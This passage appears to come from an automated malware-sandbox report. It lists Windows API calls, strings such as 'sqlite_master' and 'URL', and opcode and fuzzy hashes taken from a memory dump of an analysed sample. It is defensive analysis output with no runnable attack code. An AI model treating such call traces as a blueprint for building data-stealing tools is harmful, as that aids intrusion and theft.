                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset
                                                                                      • String ID: sqlite_master
                                                                                      • API String ID: 438689982-3163232059
                                                                                      • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                      • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                      APIs
                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 3917621476-0
                                                                                      • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                      • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                      APIs
                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 822687973-0
                                                                                      • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                      • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                      • free.MSVCRT ref: 0041747F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 2605342592-0
                                                                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                      • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2678498856-0
                                                                                      • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                      • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item
                                                                                      • String ID:
                                                                                      • API String ID: 3888421826-0
                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3727323765-0
                                                                                      • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                      • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                      • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2754987064-0
                                                                                      • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                      • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2754987064-0
                                                                                      • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                      • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2754987064-0
                                                                                      • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                      • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                      APIs
                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                      • String ID:
                                                                                      • API String ID: 764393265-0
                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                      APIs
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                      • String ID:
                                                                                      • API String ID: 979780441-0
                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                      • String ID:
                                                                                      • API String ID: 1386444988-0
                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: InvalidateMessageRectSend
                                                                                      • String ID: d=E
                                                                                      • API String ID: 909852535-3703654223
                                                                                      • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                      • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$memcpywcslen
                                                                                      • String ID: "
                                                                                      • API String ID: 1983396471-123907689
                                                                                      • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                      • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                      APIs
                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                      • String ID: URL
                                                                                      • API String ID: 2108176848-3574463123
                                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                      APIs
                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemcpy
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2789212964-323797159
                                                                                      • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                      • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _snwprintf
                                                                                      • String ID: %%-%d.%ds
                                                                                      • API String ID: 3988819677-2008345750
                                                                                      • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                      • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                      APIs
